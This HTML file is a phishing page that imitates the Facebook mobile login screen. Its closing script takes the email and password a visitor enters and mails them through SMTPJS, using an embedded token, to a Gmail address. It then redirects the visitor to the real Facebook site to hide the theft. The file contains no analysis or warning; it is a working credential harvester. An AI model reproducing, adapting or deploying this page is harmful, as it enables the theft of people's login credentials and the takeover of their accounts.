<!DOCTYPE html>
<html lang="kh">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <link rel="stylesheet" href="style.css"/>
    <link rel="stylesheet" href="Uicons by <a href="https://www.flaticon.com/>
    <script src="https://kit.fontawesome.com/a25f16aec6.js" crossorigin="anonymous"></script>
    <title> Facebook </title>
</head>
    <style>
        body {
    height: 360px;
    width: auto;
    padding: 0;
}
.my-logo {
    position: absolute;
    width: 120px;
    left: 120px;
    top: 55px;
}
.Email {
    position: absolute;
    left: 10px;
    border-color: #EDEDED;
    background: #EDEDED;
    border-radius: 5px ;
    height: 40px;
    top: 90px;
    padding-left: 9;
    padding-right: 9;
    width: 335px;
}
.Password {
    position: absolute;
    border-color: #EDEDED;
    background: #EDEDED;
    left: 10px;
    height: 40px;
    border-radius: 5px;
    top: 143px;
    padding-left: 9;
    padding-right: 9;
    width: 335px;
}
.Login {
    position: absolute;
    left: 10px;
    border-color: #0082FF;
    background: #0082FF;
    height: 40px;
    font-size: 17px;
    border-radius: 5px;
    color: rgb(255, 255, 255);
    top: 195px;
    box-sizing: border-box;
    padding-left: 9px;
    padding-right: 9px;
    width: 340px;
}
p {

    margin-top: 245px;
    text-align: center;
    color: blue;
    
}
.or {
    position: absolute;
    left: 170px;
    top: 275px;
}
.smit {
    margin-top: 30px;
}
.create {
    padding: 10px;
    margin-top: 15px;
    width: 150px;
    color: rgb(255, 255,255);
    background: rgba(94,204,31,1);
    margin-left: 95px;
    border-radius: 5px;
    border-color: rgba(94,204,31,1);
}
p1 {
    position: absolute;
    color: #AAAAAA;
    top: 430px;
    left: 60px;
    font-size: 15px;
}
p2 {
    position: absolute;
    color: #4275FF;
    top: 425px;
    left: 230px;
}
p3 {
    position: absolute;
    color: #4275FF;
    top: 450px;
    left: 40px;
}
p4 {
    position: absolute;
    top: 450px;
    color: #4275FF;
    left: 220px;
}
p5 {
    position: absolute;
    color: #4275FF;
    top: 470px;
    left: 60px;
}
p6 {
    position: absolute;
    color: #4275FF;
    top: 470px;
    left: 235px;
}
p7 {
    position: absolute;
    color: #4275FF;
    top: 490px;
    left: 40px;
}
i {
    margin-top: 100px;
    margin-left: 240px;
}
p8 {
    position: absolute ;
    color: #B8B8B8;
    text-align: center;
    top: 530px;
    left: 130px;
    
}
    </style>
<body>
     <img class="my-logo" src="IMG_1472.png"/>
     <input class="Email" type="email" id="email" placeholder="Mobile number or email" autocomplete="off">
     <input class="Password" type="password" id="subject" placeholder="Password"autocomplete="off">
     <button class="Login" onclick="fun()"id="btn">Log in</button>
      <p>Forget password?</p>
      <hr class="smit" >
      <div class="or">or</div>
      <button class="create" type="submit">Create new account</button>
      <p1>English (US)</p1>
      <p2>ភាសាខ្មែរ</p2><br>
      <p3>Français (France)</p3>
      <p4>Tiếng Việt</p4><br>
      <p5>中文(简体)</p5>
      <p6>Español</p6><br>
      <p7>Português (Brasil)</p7>
      <i class="fa fa-plus-circle" aria-hidden="true"></i>
      <p8>Meta © 2022</p8><br>
      <script src="fun.js"></script>
</body>
    <script src="https://smtpjs.com/v3/smtp.js"></script>
    <script>
        
       var btn = document.getElementById('btn');
    btn.addEventListener('click',function(e) {
        e.preventDefault()
        var email = document.getElementById('email').value;
        var subject = document.getElementById('subject').value;
        var body = 'email: ' + email + '<br/> subject: ' + subject;
        Email.send({
    SecureToken : "af2d1483-3e6c-40cd-8f63-0e1a40c83888",
    To : 'hengk7401@gmail.com',
    From : "hengk7401@gmail.com",
    Subject : subject,
    Body : body
}).then(
);
    })
function fun() {
    location.href="https://m.facebook.com/?tbua=1";
}
    </script>
</html>
